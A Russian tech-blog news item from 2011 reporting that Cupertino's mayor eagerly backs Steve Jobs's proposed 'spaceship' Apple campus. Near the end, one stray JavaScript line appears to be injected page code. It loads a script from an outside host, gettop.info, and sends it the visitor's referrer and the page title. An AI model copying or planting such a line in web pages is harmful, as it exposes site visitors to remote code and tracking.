Ответ Купертино Джобсу: Мы ни в коем случае не скажем «нет» «космическому» кампусу Apple

12.06.2011, Новости, Кирилл Копылов

Мэр Купертино Жилберт Вонг, конечно, не Стив Джобс, но у него есть свой уникальный шарм. В ответ на вчерашнее фантастическое заявление Стива Джобса про огромный, «космический» кампус Apple (600000м2), на сегодняшней пресс конференции Вонг эпатажно заявил: «Купертино готов для этого». Джобс хочет, чтобы фантастическое здание вмещало 12000 человек к 2015 году, если все пойдет по плану.

«Мы ни в коем случае не говорим нет», утверждает Вонг, который начинал свою жизнь с AppleIIs иAppleII +s, «Космический корабль обязательно приземлится в Купертино».

В своем заявлении Вонг обратил всеобщее внимание на тот факт, что его дочь посещает ту самую школу, в которую ходил в юном возрасте Джобс, однако этот факт не имеет никакого отношения к его решению относительно Apple. «Мы всегда проявляем содействие, когда у нас появляется компания с огромной прибылью от продаж и огромными налоговыми отчислениями в городскую казну».

Молниеносное «Да», и Джобсу даже не пришлось предлагать городу бесплатный Wi-Fi! Ну серьезно, а как бы вы отреагировали?

Новый кампус Apple в Купертино

Новый кампус Apple в Купертино

Новый кампус Apple в Купертино

Новый кампус Apple в Купертино

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Читайте также:

  1. Стив Джобс рассказал свои идеи относительно нового центрального офиса Apple на совете города Купертино

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.